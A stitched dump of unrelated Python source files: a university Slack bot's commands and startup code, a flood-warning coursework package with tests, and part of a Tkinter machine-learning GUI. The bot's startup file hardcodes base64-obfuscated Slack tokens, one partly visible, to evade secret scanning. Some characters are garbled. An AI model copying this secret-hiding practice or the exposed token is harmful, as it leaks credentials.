uqcsbot.post_message(TEST_CHANNEL_ID, '!water list')
messages = uqcsbot.test_messages.get(TEST_CHANNEL_ID, [])
assert len(messages) == 2
assert re.compile(r"Available regions:(.*)").match(messages[-1]['text'])
```
#### File: uqcsbot-1/uqcsbot/__init__.py
```python
import os
import sys
import importlib
import logging
import argparse
from base64 import b64decode
import json
import requests
from uqcsbot.base import bot, Command, UQCSBot # noqa
LOGGER = logging.getLogger("uqcsbot")
SLACK_VERIFICATION_TOKEN = os.environ.get("SLACK_VERIFICATION_TOKEN", "")
SLACK_BOT_TOKEN = os.environ.get("SLACK_BOT_TOKEN", "")
# Channel group which contains all the bots. Easy way to get all their ids.
SECRET_BOT_MEETING_ROOM = 'G9JJXHF7S'
# UQCSTesting tokens. Everything is base64 encoded to
# somewhat circumvent token tracking by GitHub etal.
#
# Order: uqcsbot-alpha, uqcsbot-beta, uqcsbot-gamma, uqcsbot-delta
BOT_TOKENS = {'<KEY>': '<KEY>',
'<KEY>': '<KEY>',
'<KEY>': '<KEY>',
'<KEY>': '<KEY>'}
for key in BOT_TOKENS:
BOT_TOKENS[key] = b64decode(BOT_TOKENS[key]).decode('utf-8')
# Mitch's UQCSTesting Slack API Token. No touchie >:(
UQCSTESTING_USER_TOKEN = b64decode('<KEY>NTI5LTMyNTEyMzU5ODExNS01Yj'
'dmYjlhYzAyZWYzNDAyNTYyMTJmY2Q2YjQ1NmEyYg==').decode('utf-8')
def get_user_info(user_id):
"""
Returns info about a user
See https://api.slack.com/methods/users.info for the contents of info
"""
api_url = 'https://slack.com/api/users.info'
response = requests.get(api_url, params={'token': UQCSTESTING_USER_TOKEN, 'user': user_id})
if response.status_code != requests.codes['ok']:
LOGGER.error(f'Received status code {response.status.code}')
sys.exit(1)
json_contents = json.loads(response.content)
if not json_contents['ok']:
LOGGER.error(json_contents['error'])
sys.exit(1)
return json_contents
def is_active_bot(user_info):
"""
Returns true if the provided user info describes an active bot (i.e. not deleted)
"""
if not user_info['ok']:
return False
user = user_info['user']
return user.get('is_bot', False) and not user['deleted']
def is_bot_avaliable(user_id):
"""
Returns true if the given user_id is an active bot that is available (i.e. is
not currently 'active' which would mean it is in use by another user).
"""
api_url = 'https://slack.com/api/users.getPresence'
response = requests.get(api_url, params={'token': UQCSTESTING_USER_TOKEN, 'user': user_id})
if response.status_code != requests.codes['ok']:
return False
json_contents = json.loads(response.content)
return json_contents['ok'] and json_contents['presence'] == 'away'
def get_free_test_bot():
"""
Pings a channel on the UQCSTesting Slack that contains all the available
bots, and Mitch. We can poll this channel to find bots which are 'away'
(that is, not currently being used by anyone else)
Returns info about the bot
See https://api.slack.com/methods/users.info for the contents of info
"""
api_url = 'https://slack.com/api/conversations.members'
response = requests.get(api_url, params={'token': UQCSTESTING_USER_TOKEN,
'channel': SECRET_BOT_MEETING_ROOM})
if response.status_code != requests.codes['ok']:
LOGGER.error(f'Received status code {response.status.code}')
sys.exit(1)
json_contents = json.loads(response.content)
if not json_contents['ok']:
LOGGER.error(json_contents['error'])
sys.exit(1)
for user_id in json_contents['members']:
info = get_user_info(user_id)
if is_active_bot(info) and is_bot_avaliable(user_id):
return info
return None
def import_scripts():
dir_path = os.path.dirname(__file__)
scripts_dir = os.path.join(dir_path, 'scripts')
for sub_file in os.listdir(scripts_dir):
if not sub_file.endswith('.py') or sub_file == '__init__.py':
continue
module = f'uqcsbot.scripts.{sub_file[:-3]}'
importlib.import_module(module)
def main():
# Import scripts
import_scripts()
# Setup the CLI argument parser
parser = argparse.ArgumentParser(description='Run UQCSBot')
parser.add_argument('--dev', dest='dev',
action='store_true',
help='Runs the bot in development mode (auto assigns a '
'bot on the uqcstesting Slack team)')
parser.add_argument('--log_level', dest='log_level',
default='INFO',
help='Specifies the output logging level to be used '
'(i.e. DEBUG, INFO, WARNING, ERROR, CRITICAL)')
# Retrieve the CLI args
args = parser.parse_args()
logging.basicConfig(level=args.log_level)
# If in development mode, attempt to allocate an available bot token,
# else stick with the default. If no bot could be allocated, exit.
bot_token = SLACK_BOT_TOKEN
if args.dev:
test_bot = get_free_test_bot()
if test_bot is None:
LOGGER.error('Something went wrong during bot allocation. Please ensure there'
' are bots available and try again later. Exiting.')
sys.exit(1)
bot_token = BOT_TOKENS.get(test_bot['user']['id'], None)
LOGGER.info("Bot name: " + test_bot['user']['name'])
if bot_token is None or bot_token == "":
LOGGER.error("No bot token found!")
sys.exit(1)
bot.run(bot_token, SLACK_VERIFICATION_TOKEN)
if __name__ == "__main__":
main()
```
#### File: uqcsbot/scripts/emojify.py
```python
from uqcsbot import bot, Command
from uqcsbot.utils.command_utils import loading_status
from typing import Dict, List
from collections import defaultdict
from random import shuffle, choice
@bot.on_command("emojify")
@loading_status
def handle_emojify(command: Command):
'''
`!emojify text` - converts text to emoji.
'''
master: Dict[str, List[str]] = defaultdict(lambda: [":grey_question:"])
# letters
master['A'] = [":adobe:", ":airbnb:", ":amazon:", ":anarchism:",
":arch:", ":atlassian:", ":office_access:",
choice([":card-ace-clubs:", ":card-ace-diamonds:",
":card-ace-hearts:", ":card-ace-spades:"])]
master['B'] = [":bhinking:", ":bitcoin:", ":blutes:"]
master['C'] = [":c:", ":clang:", ":cplusplus:", ":copyright:", ":clipchamp:"]
master['D'] = [":d:", ":disney:"]
master['E'] = [":ecorp:", ":emacs:", ":erlang:", ":ie10:", ":thonk_slow:", ":edge:",
":expedia_group:"]
master['F'] = [":f:", ":facebook:"]
master['G'] = [":g+:", ":google:", ":nintendo_gamecube:", ":gatsbyjs:"]
master['H'] = [":hackerrank:", ":homejoy:"]
master['I'] = [":information_source:"]
master['J'] = [":hook:", choice([":card-jack-clubs:", ":card-jack-diamonds:",
":card-jack-hearts:", ":card-jack-spades:"])]
master['K'] = [":kickstarter:", ":kotlin:",
choice([":card-king-clubs:", ":card-king-diamonds:",
":card-king-hearts:", ":card-king-spades:"])]
master['L'] = [":l:", ":lime:", ":l_plate:"]
master['M'] = [":gmail:", ":maccas:", ":mcgrathnicol:", ":melange_mining:", ":mtg:", ":mxnet:"]
master['N'] = [":nano:", ":neovim:", ":netscape_navigator:",
":nginx:", ":nintendo_64:", ":office_onenote:"]
master['O'] = [":office_outlook:", ":oracle:", ":o_:", ":tetris_o:", ":ubuntu:"]
master['P'] = [":auspost:", ":office_powerpoint:", ":office_publisher:",
":pinterest:", ":paypal:", ":producthunt:"]
master['Q'] = [":quora:", ":quantium:", choice([":card-queen-clubs:", ":card-queen-diamonds:",
":card-queen-hearts:", ":card-queen-spades:"])]
master['R'] = [":r-project:", ":rust:", ":redroom:", ":registered:"]
master['S'] = [":s:", ":skedulo:", ":stanford:", ":stripe_s:", ":sublime:", ":tetris_s:"]
master['T'] = [":tanda:", choice([":telstra:", ":telstra-pink:"]),
":tesla:", ":tetris_t:", ":torchwood:", ":tumblr:"]
master['U'] = [":uber:", ":uqu:", ":the_horns:"]
master['V'] = [":vim:", ":vue:", ":vuetify:", ":v:"]
master['W'] = [":office_word:", ":washio:", ":wesfarmers:", ":westpac:",
":weyland_consortium:", ":wikipedia_w:", ":woolworths:"]
master['X'] = [":atlassian_old:", ":aginicx:", ":sonarr:", ":x-files:", ":xbox:",
":x:", ":flag-scotland:", ":office_excel:"]
master['Y'] = [":hackernews:"]
master['Z'] = [":tetris_z:"]
# numbers
master['0'] = [":chrome:", ":suncorp:", ":disney_zero:", ":firefox:",
":mars:", choice([":dvd:", ":cd:"])]
master['1'] = [":techone:", ":testtube:", ":thonk_ping:", ":first_place_medal:"]
master['2'] = [":second_place_medal:", choice([":card-2-clubs:", ":card-2-diamonds:",
":card-2-hearts:", ":card-2-spades:"])]
master['3'] = [":css:", ":third_place_medal:", choice([":card-3-clubs:", ":card-3-diamonds:",
":card-3-hearts:", ":card-3-spades:"])]
master['4'] = [choice([":card-4-clubs:", ":card-4-diamonds:",
":card-4-hearts:"]), ":card-4-spades:"]
master['5'] = [":html:", choice([":card-5-clubs:", ":card-5-diamonds:",
":card-5-hearts:", ":card-5-spades:"])]
master['6'] = [choice([":card-6-clubs:", ":card-6-diamonds:",
":card-6-hearts:", ":card-6-spades:"])]
master['7'] = [choice([":card-7-clubs:", ":card-7-diamonds:",
":card-7-hearts:", ":card-7-spades:"])]
master['8'] = [":8ball:", choice([":card-8-clubs:", ":card-8-diamonds:",
":card-8-hearts:", ":card-8-spades:"])]
master['9'] = [choice([":card-9-clubs:", ":card-9-diamonds:",
":card-9-hearts:", ":card-9-spades:"])]
# whitespace
master[' '] = [":whitespace:"]
master['\n'] = ["\n"]
# other ascii characters (sorted by ascii value)
master['!'] = [":exclamation:"]
master['"'] = [choice([":ldquo:", ":rdquo:"]), ":pig_nose:"]
master['#'] = [":slack_old:", ":csharp:"]
master['$'] = [":thonk_money:", ":moneybag:"]
# '&' converts to '&'
master['&'] = [":ampersand:", ":dnd:"]
master['*'] = [":day:", ":nab:", ":youtried:", ":msn_star:", ":rune_prayer:", ":wolfram:"]
master['+'] = [":tf2_medic:", ":flag-ch:", ":flag-england:"]
master['-'] = [":no_entry:"]
master['.'] = [":black_small_square:"]
master['/'] = [":slash:"]
# '>' converts to '>'
master['>'] = [":accenture:", ":implying:", ":plex:", ":powershell:"]
master['?'] = [":question:"]
master['@'] = [":whip:"]
master['^'] = [":this:", ":typographical_carrot:", ":arrow_up:"]
master['~'] = [":wavy_dash:"]
# slack/uqcsbot convert the following to other symbols
# greek letters
# 'ฮ' converts to 'A'
master['ฮ'] = [":alpha:"]
# 'ฮ' converts to 'B'
master['ฮ'] = [":beta:"]
# 'ฮ' converts to 'L'
master['ฮ'] = [":halflife:", ":haskell:", ":lambda:", ":racket:"]
# 'ฮ ' converts to 'P'
master['ฮ '] = [":pi:"]
# 'ฮฃ' converts to 'S'
master['ฮฃ'] = [":polymathian:"]
# other symbols (sorted by unicode value)
# 'โฆ' converts to '...'
master['โฆ'] = [":lastpass:"]
# 'โฌ' converts to 'EUR'
master['โฌ'] = [":martian_euro:"]
# 'โ' converts to '[?]'
master['โ'] = [":sqrt:"]
# 'โ' converts to '[?]'
master['โ'] = [":arduino:", ":visualstudio:"]
# 'โด' converts to '[?]'
master['โด'] = [":julia:"]
text = ""
if command.has_arg():
text = command.arg.upper()
# revert HTML conversions
text = text.replace(">", ">")
text = text.replace("<", "<")
text = text.replace("&", "&")
lexicon = {}
for character in set(text+'โฆ'):
full, part = divmod((text+'โฆ').count(character), len(master[character]))
shuffle(master[character])
lexicon[character] = full * master[character] + master[character][:part]
shuffle(lexicon[character])
ellipsis = lexicon['โฆ'].pop()
response = ""
for character in text:
emoji = lexicon[character].pop()
if len(response + emoji + ellipsis) > 4000:
response += ellipsis
break
response += emoji
bot.post_message(command.channel_id, response)
```
#### File: uqcsbot/scripts/events.py
```python
from typing import List
import re
from datetime import date, datetime, timedelta
from calendar import month_name, month_abbr, day_abbr
from icalendar import Calendar
import requests
from pytz import timezone, utc
from typing import Tuple, Optional
from uqcsbot import bot, Command
from uqcsbot.utils.command_utils import UsageSyntaxException, loading_status
from uqcsbot.utils.itee_seminar_utils import (get_seminars, HttpException, InvalidFormatException)
CALENDAR_URL = ("https://calendar.google.com/calendar/ical/"
+ "q3n3pce86072n9knt3pt65fhio%40group.calendar.google.com/public/basic.ics")
FILTER_REGEX = re.compile('full|all|[0-9]+( weeks?)?|jan.*|feb.*|mar.*'
+ '|apr.*|may.*|jun.*|jul.*|aug.*|sep.*|oct.*|nov.*|dec.*')
BRISBANE_TZ = timezone('Australia/Brisbane')
# empty string to one-index
MONTH_NUMBER = {month.lower(): index for index, month in enumerate(month_abbr)}
class EventFilter(object):
def __init__(self, full=False, weeks=None, cap=None, month=None, is_valid=True):
self.is_valid = is_valid
self._full = full
self._weeks = weeks
self._cap = cap
self._month = month
@classmethod
def from_argument(cls, argument: str):
if not argument:
return cls(weeks=2)
else:
match = re.match(FILTER_REGEX, argument.lower())
if not match:
return cls(is_valid=False)
filter_str = match.group(0)
if filter_str in ['full', 'all']:
return cls(full=True)
elif 'week' in filter_str:
return cls(weeks=int(filter_str.split()[0]))
elif filter_str[:3] in MONTH_NUMBER:
return cls(month=MONTH_NUMBER[filter_str[:3]])
else:
return cls(cap=int(filter_str))
def filter_events(self, events: List['Event'], start_time: datetime):
if self._weeks is not None:
end_time = start_time + timedelta(weeks=self._weeks)
return [e for e in events if e.start < end_time]
if self._month is not None:
return [e for e in events if e.start.month == self._month]
elif self._cap is not None:
return events[:self._cap]
return events
def get_header(self):
if self._full:
return "List of *all* upcoming events"
elif self._weeks is not None:
return f"Events in the *next _{self._weeks}_ weeks*"
elif self._month is not None:
return f"Events in *_{month_name[self._month]}_*"
else:
return f"The *next _{self._cap}_ events*"
def get_no_result_msg(self):
if self._weeks is not None:
return f"There don't appear to be any events in the next *{self._weeks}* weeks"
elif self._month is not None:
return f"There don't appear to be any events in *{month_name[self._month]}*"
else:
return "There don't appear to be any upcoming events..."
class Event(object):
def __init__(self, start: datetime, end: datetime,
location: str, summary: str, link: Optional[str]):
self.start = start
self.end = end
self.location = location
self.summary = summary
self.link = link
@classmethod
def encode_text(cls, text: str) -> str:
"""
Encodes user-specified text so that it is not interpreted as command characters
by Slack. Implementation as required by: https://api.slack.com/docs/message-formatting
Note that this encoding process does not stop injection of text effects (bolding,
underlining, etc.), or a malicious user breaking the text formatting in the events
command. It should, however, prevent <, & and > being misinterpreted and including
links where they should not.
--
:param text: The text to encode
:return: The encoded text
"""
return text.replace("&", "&").replace("<", "<").replace(">", ">")
@classmethod
def from_cal_event(cls, cal_event):
start = cal_event.get('dtstart').dt
end = cal_event.get('dtend').dt
# ical 'dt' properties are parsed as a 'DDD' (datetime, date, duration) type.
# The below code converts a date to a datetime, where time is set to midnight.
if isinstance(start, date) and not isinstance(start, datetime):
start = datetime.combine(start, datetime.min.time()).astimezone(utc)
if isinstance(end, date) and not isinstance(end, datetime):
end = datetime.combine(end, datetime.max.time()).astimezone(utc)
location = cal_event.get('location', 'TBA')
summary = cal_event.get('summary')
return cls(start, end, location, summary, None)
@classmethod
def from_seminar(cls, seminar_event: Tuple[str, str, datetime, str]):
title, link, start, location = seminar_event
# ITEE doesn't specify the length of seminars, but they are normally one hour
end = start + timedelta(hours=1)
# Note: this
return cls(start, end, location, title, link)
def __str__(self):
d1 = self.start.astimezone(BRISBANE_TZ)
d2 = self.end.astimezone(BRISBANE_TZ)
start_str = (f"{day_abbr[d1.weekday()].upper()}"
+ f" {month_abbr[d1.month].upper()} {d1.day} {d1.hour}:{d1.minute:02}")
if (d1.month, d1.day) != (d2.month, d2.day):
end_str = (f"{day_abbr[d2.weekday()].upper()}"
+ f" {month_abbr[d2.month].upper()} {d2.day} {d2.hour}:{d2.minute:02}")
else:
end_str = f"{d2.hour}:{d2.minute:02}"
# Encode user-provided text to prevent certain characters
# being interpreted as slack commands.
summary_str = Event.encode_text(self.summary)
location_str = Event.encode_text(self.location)
if self.link is None:
return f"*{start_str} - {end_str}* - `{summary_str}` - _{location_str}_"
else:
return f"*{start_str} - {end_str}* - `<{self.link}|{summary_str}>` - _{location_str}_"
def get_current_time():
"""
returns the current date and time
this function exists purely so it can be mocked for testing
"""
return datetime.now(tz=BRISBANE_TZ).astimezone(utc)
@bot.on_command('events')
@loading_status
def handle_events(command: Command):
"""
`!events [full|all|NUM EVENTS|<NUM WEEKS> weeks] [uqcs|itee]`
- Lists all the UQCS and/or ITEE events that are
scheduled to occur within the given filter.
If unspecified, will return the next 2 weeks of events.
"""
argument = command.arg if command.has_arg() else ""
source_get = {"uqcs": False, "itee": False}
for k in source_get:
if k in argument:
source_get[k] = True
argument = argument.replace(k, "")
argument = argument.strip()
if not any(source_get.values()):
source_get = dict.fromkeys(source_get, True)
event_filter = EventFilter.from_argument(argument)
if not event_filter.is_valid:
raise UsageSyntaxException()
cal = Calendar.from_ical(get_calendar_file())
current_time = get_current_time()
events = []
# subcomponents are how icalendar returns the list of things in the calendar
if source_get["uqcs"]:
for c in cal.subcomponents:
# TODO: support recurring events
# we are only interested in ones with the name VEVENT as they
# are events we also currently filter out recurring events
if c.name != 'VEVENT' or c.get('RRULE') is not None:
continue
# we convert it to our own event class
event = Event.from_cal_event(c)
# then we want to filter out any events that are not after the current time
if event.start > current_time:
events.append(event)
if source_get["itee"]:
try:
# Try to include events from the ITEE seminars page
seminars = get_seminars()
for seminar in seminars:
# The ITEE website only lists current events.
event = Event.from_seminar(seminar)
events.append(event)
except (HttpException, InvalidFormatException) as e:
bot.logger.error(e.message)
# then we apply our event filter as generated earlier
events = event_filter.filter_events(events, current_time)
# then, we sort the events by date
events = sorted(events, key=lambda e: e.start)
# then print to the user the result
if not events:
message = (f"_{event_filter.get_no_result_msg()}_\r\n"
"For a full list of events, visit: https://uqcs.org.au/calendar.html"
+ " and https://www.itee.uq.edu.au/seminar-list")
else:
message = f"{event_filter.get_header()}\r\n" + '\r\n'.join(str(e) for e in events)
bot.post_message(command.channel_id, message)
def get_calendar_file() -> bytes:
"""
Loads the UQCS Events calender .ics file from Google Calendar.
This method is mocked by unit tests.
:return: The returned ics calendar file, as a stream
"""
http_response = requests.get(CALENDAR_URL)
return http_response.content
```
#### File: uqcsbot/scripts/water.py
```python
from uqcsbot import bot, Command
import requests
from bs4 import BeautifulSoup
from typing import List, Tuple
from uqcsbot.utils.command_utils import UsageSyntaxException
LIST_COMMAND = ['ls', 'list', 'dir']
REGIONS = {
'seq': {
'aliases': ['brisbane', 'bne', 'brisvegas', 'qld', 'queensland'],
'url': 'https://www.seqwater.com.au/dam-levels'
}
}
@bot.on_command("water")
def handle_water(command: Command):
"""
`!water <REGION>` - Prints the dam level for the region.
`!water <LIST|LS|DIR>` - Prints a list of all regions.
"""
if not command.has_arg():
raise UsageSyntaxException()
words = command.arg.split(' ')
if len(words) > 1:
raise UsageSyntaxException()
response = []
# Print the list of regions
if words[0].lower() in LIST_COMMAND:
response.append("Available regions:")
for region in REGIONS:
response.append(f">{region} (aliases: {', '.join(REGIONS[region]['aliases'])})")
else:
# Print the info for a specific region
if words[0].lower() in REGIONS or words[0].lower() in [alias['aliases'] for alias in REGIONS.values()]:
actual_region = words[0].lower()
name = words[0]
if words[0].lower() not in REGIONS:
for region in REGIONS:
if words[0].lower() in REGIONS[region]['aliases']:
actual_region = region
name = region
if actual_region == 'seq':
http_response = requests.get(REGIONS[actual_region]['url'])
html = BeautifulSoup(http_response.content, 'html.parser')
maximum_prev_sibling = html.find("div", string='Full supply capacity')
maximum_reading = maximum_prev_sibling.find_next_sibling("div")
current_prev_sibling = html.find("div", string='Current capacity')
current_reading = current_prev_sibling.find_next_sibling("div")
maximum = int("".join(list(filter(str.isdigit, maximum_reading.get_text()))))
current = int("".join(list(filter(str.isdigit, current_reading.get_text()))))
percent = 100 * (current / maximum)
response.append(f"{name} is at *{percent:3.2f}%* ({current:,}ML of {maximum:,}ML)")
else:
response.append(f"No region or alias found matching '{words[0]}'")
else:
response.append(f"No region or alias found matching '{words[0]}'")
bot.post_message(command.channel_id, '\r\n'.join(response))
``` |
{
"source": "Joseph-Garvey/Flood-Warning",
"score": 3
} |
#### File: Flood-Warning/floodsystem/analysis.py
```python
import numpy as np
import matplotlib.dates as dt
import matplotlib.pyplot as plt
# implement function
# input: water level time history (dates, levels) for a station
# computes least-squares fit polynomial of a degree p to water level data
# returns:
# tuple of
# polynomaial object
# shift of time (date) axis
#task 2F
#TODO #2 return correct object
#TODO #9 test this whether returns correct type
def polyfit(dates, levels, p):
dates = dt.date2num(dates)
p_coeff = np.polyfit(dates - dates[0], levels, p)
poly = np.poly1d(p_coeff)
return poly, dt.date2num(dates[0])
def gradientcalc(poly, t):
der = np.polyder(poly)
return der(t)
```
#### File: Flood-Warning/floodsystem/predictor.py
```python
from .station import MonitoringStation
def predictor(stations, gradient_weight, rel_weight, abs_weight):
"""assigns an attribute 'station_risk' to each MonitoringStation object based on a weighted sum of rel_water_level & gradient
Parameters:
stations = list of MonitoringStation objects \n
gradient_weight = weight of gradient \n
relative_weight = weight of rel_water_level
abs_weight = weight of absolute level difference from average of typical range values
"""
for station in stations:
station_risk = (gradient_weight * (station.der) + rel_weight *
(station.relative_water_level) + abs_weight * (station.latest_level - (station.typical_range[0] + station.typical_range[1]) / 2)) / (gradient_weight + rel_weight)
station.station_risk = station_risk
return stations
def assigning_risk(stations, severe_threshold, high_threshold, moderate_threshold):
"""assigns an attribute string (1 of 4: โsevereโ, โhighโ, โmoderateโ or โlowโ) to each station object
Parameters:
stations = list of MonitoringStation objects \n
thresholds = floats that determine what station_risk values count as each label
"""
for station in stations:
if station.station_risk > severe_threshold:
risk_label = "severe"
elif station.station_risk > high_threshold:
risk_label = "high"
elif (station.station_risk > moderate_threshold) or station.latest_level > station.typical_range[1]:
risk_label = "moderate"
else:
risk_label = "low"
station.risk_label = risk_label
return stations
```
#### File: Joseph-Garvey/Flood-Warning/Task1F.py
```python
from floodsystem.stationdata import build_station_list
from floodsystem.station import inconsistent_typical_range_stations
def run():
"""Task 1F: prints a list of station names, in alphabetical order, for stations with inconsistent data"""
# Build list of stations
stations = build_station_list()
# Create empty list
incons_station_names = []
# Loop over incons_stations list
for station in inconsistent_typical_range_stations(stations):
# Get station names
incons_station_names.append(station.name)
# Sort list by alphabetical order & print
sorted_incons_station_names = sorted(incons_station_names)
print(sorted_incons_station_names)
if __name__ == "__main__":
print("*** Task 1F: CUED Part IA Flood Warning System ***")
run()
```
#### File: Joseph-Garvey/Flood-Warning/test_predictor.py
```python
from floodsystem.station import MonitoringStation
from floodsystem.predictor import predictor, assigning_risk
# Create list of dummy stations, 1 with consistent & available data, 1 with empty level data, 1 with empty typical data, 1 with inconsistent low/high data
station_D = MonitoringStation('ID D', 'Measurement ID D', 'Name D', (0.0, 20.0), (1.0, 2.0), 'Big River', 'Town D')
station_D.latest_level = 1.5
station_D.der = 2.0
station_E = MonitoringStation('ID E', 'Measurement ID E', 'Name E', (0.0, 20.0), (1.0, 2.0), 'Big River', 'Town E')
station_E.latest_level = 1.9
station_E.der = 1.0
station_F = MonitoringStation('ID F', 'Measurement ID F', 'Name F', (0.0, 20.0), (1.0, 2.0), 'Big River', 'Town F')
station_F.latest_level = 2.0
station_F.der = 2.0
station_list = [station_D, station_E, station_F]
def test_predictor():
predictor(station_list, gradient_weight=1, rel_weight=5, abs_weight=15)
# assert that attribute type is a float
for station in station_list:
assert type(station.station_risk) == float
# assert that attribute value is as expected
assert station_D.station_risk == 0.75
assert station_E.station_risk == 1.9166666666666663
assert station_F.station_risk == 2.4166666666666665
def test_assigning_risk():
assigning_risk(station_list, severe_threshold=3, high_threshold=2.25, moderate_threshold=1.5)
# assert that attribute type is a string
for station in station_list:
assert type(station.risk_label) == str
# assert that attribute value is as expected
assert station_D.risk_label == 'low'
assert station_E.risk_label == 'moderate'
assert station_F.risk_label == 'high'
``` |
{
"source": "Joseph-Garzon/MachineLearningGUI",
"score": 3
} |
#### File: Joseph-Garzon/MachineLearningGUI/newML_gui_v11.py
```python
from tkinter import Tk, ttk, Frame, Button, Label, Entry, Text, Checkbutton, Radiobutton,\
Scale, Listbox, Menu, N, E, S, W, HORIZONTAL, END, FALSE, IntVar, StringVar
#from tkinter import BOTH, RIGHT, RAISED, messagebox as box, PhotoImage
#import os
import numpy as np
import matplotlib.pyplot as plt
import read_text_file as rd
import read_header_line as rhl
import scatterg as a2dscatter
import scatterg3D as a3dscatter
import Normalize_Features as NF
import Randomize_training_samples as RTS
#import Gather_Attrib_Statistics as SA
#Creating GUI
class Compact_Frame(Frame):
def __init__(self, master): #Initialize the frame
super(Compact_Frame, self).__init__(master) #super class Constructor
self.pack() #Make the frame a pack to control geometry.
self.FeaturesDef = ['X1',
'X2',
'X3',
'...',
'...',
'Y']
self.NormalizeVar=0
self.v=IntVar(self)
self.v.set(1) #Initialize without normalization or randomization
self.v_dim=IntVar(self)
self.v_dim.set(2) #Initialize dimensions to 2D
self.sizeTrainXval=StringVar(self)
self.sizeTrainXval.set('Click Button')
self.centreWindow()
self.create_widgets()
self.plot_data()
self.plot_predictions()
self.dimension()
def create_widgets(self): #Create a new class for widgets
#Event Menu Bar
menubar = Menu(self.master)
self.master.config(menu=menubar)
fileMenu = Menu(menubar)
fileMenu.add_command(label="Input Training Data", command=self.input_train_file)
fileMenu.add_command(label="Input Unlabeled Data", command=self.input_unlabeled_file)
fileMenu.add_command(label="Exit", command=self.quit)
menubar.add_cascade(label="File", menu=fileMenu)
#Event Label/text box that will be shown adjacent text box (Training File Label)
self.TrainingNameLabel = Label(self, text="Training File:")
self.TrainingNameLabel.grid(row=0, column=0, sticky=W+E)
self.TrainingNameText = Entry(self, width=20)
self.TrainingNameText.grid(row=0, column=1, padx=5, pady=5, ipady=2, sticky=W+E)
#Event Label/text box that will be shown adjacent text box (Unlabeled (application File Label)
self.ApplicationNameLabel = Label(self, text="Application File:")
self.ApplicationNameLabel.grid(row=1, column=0, sticky=W+E)
self.ApplicationNameText = Entry(self, width=20)
self.ApplicationNameText.grid(row=1, column=1, padx=5, pady=5, ipady=2, sticky=W+E)
#Event Feature List Box
self.FeaturesDefList = Listbox(self, height=6)
for t in self.FeaturesDef:
self.FeaturesDefList.insert(END, t)
self.FeaturesDefList.grid(row=2, column=0, columnspan=2, pady=5, sticky=N+E+S+W)
#Event Labels and text boxes to populate matrix
self.X1_label = Label(self, text="X1 in column")
self.X1_label.grid(row=4, column=0, sticky=W)
self.X2_label = Label(self, text="X2 in column")
self.X2_label.grid(row=5, column=0, sticky=W)
self.X3_label = Label(self, text="X3 in column")
self.X3_label.grid(row=6, column=0, sticky=W)
self.y_label = Label(self, text="Label in column")
self.y_label.grid(row=7, column=0, sticky=W)
self.num_labels = Label(self, text="# of Labels")
self.num_labels.grid(row=8, column=0, sticky=W)
self.X1 = Entry(self)
self.X1.grid(row=4, column=1, sticky=W)
self.X2 = Entry(self)
self.X2.grid(row=5, column=1, sticky=W)
self.X3 = Entry(self)
self.X3.grid(row=6, column=1, sticky=W)
self.y = Entry(self)
self.y.grid(row=7, column=1, sticky=W)
self.num_labels = Entry(self)
self.num_labels.grid(row=8, column=1, sticky=W)
#Event icon in to Populate matrix
from PIL import Image, ImageTk
self.image = Image.open("LeftArrow_Icon2.JPG")
self.resized = self.image.resize((23, 10),Image.ANTIALIAS)
self.arrow=ImageTk.PhotoImage(self.resized)
#Event buttons to Populate matrix
self.X1_button = Button(self, width=10, command=self.X1bttnAction)
self.X1_button.grid(row=4, column=1, padx=130, sticky=W)
self.X1_button.config(image=self.arrow, width=25,height=12)
self.X2_button = Button(self, width=10, command=self.X2bttnAction)
self.X2_button.grid(row=5, column=1, padx=130, sticky=W)
self.X2_button.config(image=self.arrow, width=25,height=12)
self.X3_button = Button(self, width=10, command=self.X3bttnAction)
self.X3_button.grid(row=6, column=1, padx=130, sticky=W)
self.X3_button.config(image=self.arrow, width=25,height=12)
self.y_button = Button(self, width=10, command=self.ybttnAction)
self.y_button.grid(row=7, column=1, padx=130, sticky=W)
self.y_button.config(image=self.arrow, width=25,height=12)
#########
#Event Matrix Text after selecting the features and averaging
self.MatrixText = Text(self, padx=5, pady=5, width=20, height=10)
self.MatrixText.grid(row=9, column=0, columnspan=3, pady=5, sticky=N+E+S+W)
#Event Label Text after selecting the features and averaging
self.labelText = Text(self, padx=5, pady=5, width=20, height=10)
self.labelText.grid(row=9, column=3, columnspan=1, pady=5, sticky=N+E+S+W)
## columns>=2
#Event Sliding bar Training Samle Size and label
self.sizeVar = StringVar()
self.sizeLabel = Label(self, text="Training Sample Size:",
textvariable=self.sizeVar)
self.sizeLabel.grid(row=0, column=2, columnspan=2, sticky=W+E)
self.sizeScale = Scale(self, from_=10, to=100, orient=HORIZONTAL,
resolution=5, command=self.onsizeScale, tickinterval=10)
self.sizeScale.grid(row=1, column=2, columnspan=2, padx=10, sticky=W+E)
#Event label training and xvalidation matrix shapes
# self.sizeTrainXval=StringVar()
self.MatrixLabel = Label(self, text="Training Shape:",
textvariable=self.sizeTrainXval)
self.MatrixLabel.grid(row=0, column=4, columnspan=2, padx=10, sticky=E+W)
#Event create training and xvalidation samples
self.TrainXvalBtn = Button(self, text="Training Matrix", width=30, command=self.RandomTrainSample)
self.TrainXvalBtn.grid(row=1, column=4, columnspan=2, padx=10, sticky=E+W)
#Event Checkbutton to normalize training data.
self.NormalizeVar = IntVar()
self.NormalizeCheckBtn = Checkbutton(self, text="Normalized?", variable=self.NormalizeVar, command=self.NormChecked)
self.NormalizeCheckBtn.grid(row=2, column=4, sticky=W+N)
#Event estimate Average
self.AvgBtn = Button(self, text="Gather Average", width=10, command=self.GatherAverage)
self.AvgBtn.grid(row=2, column=2, padx=5, pady=40, sticky=W+N+S)
self.check_Matrix = Button(self, text="Define/Check Matrix X", command=self.reveal_matrix)
self.check_Matrix.grid(row=7, column=3, sticky=W+E)
#Label Method Selection Combo Box
self.algorithmLabel = Label(self, text="Method")
self.algorithmLabel.grid(row=10, column=0, sticky=W+E)
######### Bottom, application of the algorithms
#Event Combo Box 1 Method of Machine Learning
self.methodVar = StringVar()
self.methodCombo = ttk.Combobox(self, textvariable=self.methodVar)
self.methodCombo['values'] = ('Select Method',
'Naive Bayes',
'Logistical Regression',
'Support Vector Machine',
'Neural Network SciKit',
'Neural Network 2')
self.methodCombo.current(0)
self.methodCombo.bind("<<ComboboxSelected>>", self.newMethod)
self.methodCombo.grid(row=10, column=1, padx=5, pady=10, ipady=4, sticky=W)
#Event estimate Average
self.RunMLalgBtn = Button(self, text="Run ML Alg.", width=10, command=self.RunML)
self.RunMLalgBtn.grid(row=10, column=2, padx=5, pady=3, sticky=W+E)
#Output labeled data
self.outputBtn=Button(self, text="Output", width=10, command=self.outputtxt)
